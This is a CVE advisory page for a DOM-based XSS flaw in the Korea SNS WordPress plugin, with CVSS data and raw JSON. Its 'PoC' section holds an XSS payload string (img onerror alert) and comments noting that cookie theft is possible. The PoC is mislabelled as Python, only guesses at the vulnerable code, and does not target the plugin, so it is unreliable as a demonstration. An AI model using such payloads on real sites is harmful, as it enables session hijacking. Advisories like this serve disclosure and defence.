Security Vulnerability Report
中文
CVE-2026-39667 CVSS 5.9 MEDIUM

CVE-2026-39667

Published: 2026-04-08 09:16:38
Last Modified: 2026-04-24 18:06:04

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jongmyoung Kim Korea SNS korea-sns allows DOM-Based XSS.This issue affects Korea SNS: from n/a through <= 1.7.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Korea SNS <= 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-39667 --> <!-- Description: The application fails to sanitize user input before placing it into the DOM. --> <!-- Usage: Access the vulnerable URL with the payload in the specific parameter (e.g., hash or query param) --> <script> // Malicious payload simulating an attacker's intent // In a real scenario, this could be a payload to steal cookies or perform actions on behalf of the user. var payload = "<img src=x onerror=alert('XSS_CVE-2026-39667')>"; // The vulnerable code pattern likely resembles this: // var userInput = location.hash.substring(1); // Getting data from URL // document.getElementById('someElement').innerHTML = userInput; // Unsafe sink // Simulating the vulnerability execution console.log("If vulnerable, the following HTML would be rendered:"); console.log(payload); // alert(1) demonstrates code execution capability alert('PoC Triggered: If this alert appears, the site is vulnerable to CVE-2026-39667'); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39667", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:38.037", "lastModified": "2026-04-24T18:06:04.160", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jongmyoung Kim Korea SNS korea-sns allows DOM-Based XSS.This issue affects Korea SNS: from n/a through <= 1.7.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/korea-sns/vulnerability/wordpress-korea-sns-plugin-1-7-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}